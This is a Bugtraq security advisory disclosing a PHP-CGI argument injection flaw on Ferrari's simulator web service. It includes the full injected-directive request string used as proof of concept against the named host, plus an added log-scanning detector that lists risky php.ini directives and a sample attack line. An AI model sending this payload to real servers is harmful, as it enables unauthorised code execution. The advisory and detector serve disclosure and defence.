Bugtraq mailing list archives

Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


From: Vulnerability Lab <research () vulnerability-lab com>
Date: Fri, 7 Aug 2015 19:23:38 +0200

Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562

Video: http://www.vulnerability-lab.com/get_content.php?id=1561

Vulnerability Magazine: 
http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection


Release Date:
=============
2015-08-07


Vulnerability Laboratory ID (VL-ID):
====================================
1562


Common Vulnerability Scoring System:
====================================
9.2


Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello, Silverstone and Nürburgring), while HD screens literally wrap 180 degrees around them, delivering ultra-realistic graphics to boot. The experience perfectly illustrates the concept of the new Ferrari Store, which was opened just two months ago and was conceived not merely as a shopping destination but also as an entertainment venue. With four F1 simulators, interactive video walls and numerous multisensory positions, the new 750 square meter space treats visitors to a completely immersive experience of the Ferrari legend.

(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a remote code execution vulnerability in the official Ferrari online service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-08-07:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped `=` in the query string, the string is split on `+` (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the 'encoded in a system-defined manner' from the RFC) and then passes them to the CGI binary." This module can also be used to exploit the Plesk 0day disclosed by kingcope and exploited in the wild in June 2013. (Source: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)
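The argv rule quoted above is what a defender can replay over web-server logs: a query string with no unescaped "=" that decodes into PHP command-line switches is the signature of this bug. The following detection script is an added example, not part of the advisory or of the Rapid7 module; the log lines, IP addresses and the flag/directive lists it checks are constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP-CGI switches named in this advisory that must never reach the interpreter via the query string.
CLI_FLAGS = {"-d", "-n"}
# php.ini directives from the advisory whose injection via -d leads straight to code execution.
RISKY_DIRECTIVES = {"auto_prepend_file", "allow_url_include", "disable_functions",
                    "open_basedir", "safe_mode", "cgi.force_redirect"}
# Constructed Apache combined-log lines: benign, advisory-style RCE attempt, bare -n probe.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Jun/2015:09:16:13 +0200] "GET /book/?lang=en HTTP/1.1" 200 512
203.0.113.9 - - [16/Jun/2015:09:18:41 +0200] "POST /cgi-bin/php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 200 38
203.0.113.7 - - [16/Jun/2015:09:20:02 +0200] "GET /cgi-bin/php?-n HTTP/1.1" 200 9001
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

def cgi_argv_from_query(query: str) -> list[str]:
    """Mirror the RFC 3875 rule PHP-CGI applied before the fix: with no unescaped '='
    in the query string, split on '+' and URL-decode each part into an argv entry."""
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]

def classify_target(target: str) -> dict:
    """Return injected switches, the directives set with -d and a severity for one request target."""
    _, _, query = target.partition("?")
    argv = cgi_argv_from_query(query)
    flags = [a for a in argv if a in CLI_FLAGS]
    directives = [argv[i + 1].split("=", 1)[0]
                  for i, a in enumerate(argv) if a == "-d" and i + 1 < len(argv)]
    if any(d in RISKY_DIRECTIVES for d in directives):
        severity = "critical"   # php://input prepend, url include etc.: code execution
    elif flags:
        severity = "high"       # any switch reaching argv already proves the bug
    else:
        severity = "none"
    return {"severity": severity, "flags": flags, "directives": directives}

def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and collect findings for requests that inject CGI arguments."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_target(m["target"])
        if result["severity"] != "none":
            findings.append({"ip": m["ip"], "method": m["method"], **result})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the rule only fires when the query string has no literal "=", requests carrying %3D-encoded directives are still decoded and caught, which is exactly the case the advisory's PoC request relies on.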


Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce, follow the provided information and steps below.

How I found the vulnerability: As part of any penetration test, fingerprinting is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12, which is known to be vulnerable to a command execution vulnerability.

The Response: 
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

I started testing for this vulnerability manually and noticed code execution could be performed, when making a POST request to:

http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n

I noticed an error.
http://i.imgur.com/lFPgpyn.png

When sending some PHP script along with the POST request, I noticed the script was executed. I sent this script: <?php echo(md5(kieran)); ?> and the right hash was returned.

I then did some automated testing with a Metasploit script and this also gave positive results.

The exploit script can be found here: http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

The PoC with both manual and automated exploitation can be found here: https://www.youtube.com/watch?v=vv7SMWC08eI


Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)


Security Risk:
==============
The security risk of the code execution web vulnerability in the Ferrari simulator online service is estimated as critical (CVSS 9.2).


Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt


